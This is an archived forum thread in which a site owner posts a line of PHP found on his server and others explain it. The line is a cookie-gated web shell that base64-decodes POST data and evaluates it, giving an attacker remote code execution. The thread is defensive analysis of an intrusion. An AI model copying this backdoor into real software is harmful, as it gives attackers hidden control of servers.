View Full Version : PHP Guys - A Quick Question
Scotty.T
09-07-09, 07:06 PM
What is this PHP doing please?
if(md5($_COOKIE['111ac270a980f056'])=="242e3b1f5e42d779b0717a124ed70477"){ eval(base64_decode($_POST['file']));exit;}
http://twitter.com/akella
redwhiteandblue
09-07-09, 07:20 PM
If you have a cookie named "111ac270a980f056" the md5 hash encoded value of which is equal to "242e3b1f5e42d779b0717a124ed70477", then the contents of the POST variable "file" are base64 unencoded and evaluated as a PHP instruction. Which could be anything.
Scotty.T
09-07-09, 07:20 PM
http://twitter.com/
Yeah that's where I copied i from. Follow it all through and it's in Russian which i don't get :)
Scotty.T
09-07-09, 07:22 PM
If you have a cookie named "111ac270a980f056" the md5 hash encoded value of which is equal to "242e3b1f5e42d779b0717a124ed70477", then the contents of the POST variable "file" are base64 unencoded and evaluated as a PHP instruction. Which could be anything.
Yeah it's a hack or an attempted hack of some sort, was just trying to understand what it might have done.
redwhiteandblue
09-07-09, 07:24 PM
Yeah it's a hack or an attempted hack of some sort, was just trying to understand what it might have done.
Without knowing what the contents of $_POST["file"] are it's impossible to say.
Scotty.T
09-07-09, 07:25 PM
If you have a cookie named "111ac270a980f056" the md5 hash encoded value of which is equal to "242e3b1f5e42d779b0717a124ed70477", then the contents of the POST variable "file" are base64 unencoded and evaluated as a PHP instruction. Which could be anything.
So it's very likely that there is more than one part to this?
redwhiteandblue
09-07-09, 08:02 PM
So it's very likely that there is more than one part to this?
Well in order for there to be POST data present, it normally is submitted as the contents of an HTML form. So the first part will be an HTML page containing a form with an input field named "file". And something somewhere to set the cookie.
Scotty.T
09-07-09, 08:07 PM
Well in order for there to be POST data present, it normally is submitted as the contents of an HTML form. So the first part will be an HTML page containing a form with an input field named "file". And something somewhere to set the cookie.
Thanks guys.
Digging a bit deeper and I can see that it is highly probable that it has been a link spam injection exploit.
evanovic
09-09-09, 02:01 PM
yep looks like they'll be posting a file with encoded php code, then that line will decode it and run the code, meaning they can get access to the server or do whatever they like pretty much
Scotty.T
09-09-09, 02:16 PM
yep looks like they'll be posting a file with encoded php code, then that line will decode it and run the code, meaning they can get access to the server or do whatever they like pretty much
Thanks. It's all been sorted now.
Am getting pirmed for a war with the hackers.
SimonSubAms
09-09-09, 11:02 PM
Am getting pirmed for a war with the hackers.
Are they back in fashion?
http://www.loadofballs.com/wp-content/images/keegan.jpg
vBulletin® v3.7.2, Copyright ©2000-2012, Jelsoft Enterprises Ltd.